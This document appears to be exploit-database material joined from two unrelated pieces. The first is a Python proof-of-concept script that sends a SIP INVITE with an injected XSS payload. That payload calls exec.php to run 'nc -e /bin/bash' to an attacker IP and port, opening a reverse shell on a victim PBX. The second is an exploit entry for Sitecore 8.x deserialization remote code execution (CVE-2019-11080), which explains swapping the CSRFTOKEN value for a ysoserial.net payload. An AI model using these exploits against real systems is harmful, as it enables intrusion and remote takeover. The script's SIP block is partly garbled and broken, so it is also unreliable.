# edit these variables to set up attack victim_addr="10.10.10.10" victim_host="victim-pbx1.example.com" victim_num="12125551212" attacker_ip="10.10.10.20" attacker_port=4444 def encode(val): ret="" for c in val: ret+="\\x%02x" % ord(c) return ret callid=md5(str(randint(0,99999999))).hexdigest() cmd="nc -e /bin/bash %s %d" % (attacker_ip, attacker_port) payload="q=new XMLHttpRequest();q.open('GET','exec.php?cmd=system %s',true);q.send();" % cmd xss=";tag=%s To: Call-ID: %s CSeq: 1 INVITE Contact: Max-Forwards: 70 User-Agent: Exploit POC Content-Type: application/sdp Allow: INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE, MESSAGE Content-Length: 209 v=0 o=root 1204310316 1204310316 IN IP4 127.0.0.1 s=Media Gateway c=IN IP4 127.0.0.1 t=0 0 m=audio 4446 RTP/AVP 0 101 a=rtpmap:0 PCMU/8000 a=rtpmap:101 telephone-event/8000 a=fmtp:101 0-16 a=ptime:2 a=sendrecv""" % (victim_num, victim_host, xss, callid, victim_num, victim_host, callid) payload=payload.replace("\n","\r\n") s=socket.socket() s.connect((victim_addr,5080)) print payload print s.send(payload) data=s.recv(8192) print data
-
Sitecore 8.x - Deserialization Remote Code Execution
# Exploit Title: Sitecore v 8.x Deserialization RCE
# Date: Reported to vendor October 2018, fix released April 2019.
# Exploit Author: Jarad Kopf
# Vendor Homepage: https://www.sitecore.com/
# Software Link: Sitecore downloads: https://dev.sitecore.net/Downloads.aspx
# Version: Sitecore 8.0 Revision 150802
# Tested on: Windows
# CVE : CVE-2019-11080

Exploit:
Authentication is needed for this exploit. An attacker needs to log in to the Admin section of Sitecore 8.0 revision 150802. When choosing to serialize users or domains in the admin UI, the calls to /sitecore/shell/~/xaml/Sitecore.Shell.Applications.Dialogs.Progress.aspx include a CSRFTOKEN parameter. Replacing that parameter's value with a URL-encoded, base64-encoded payload crafted with ysoserial.net results in remote code execution, i.e. the server deserializes the untrusted parameter value with a .NET formatter that is not restricted to safe types. Any account that can reach this admin dialog is sufficient; no further privilege is required.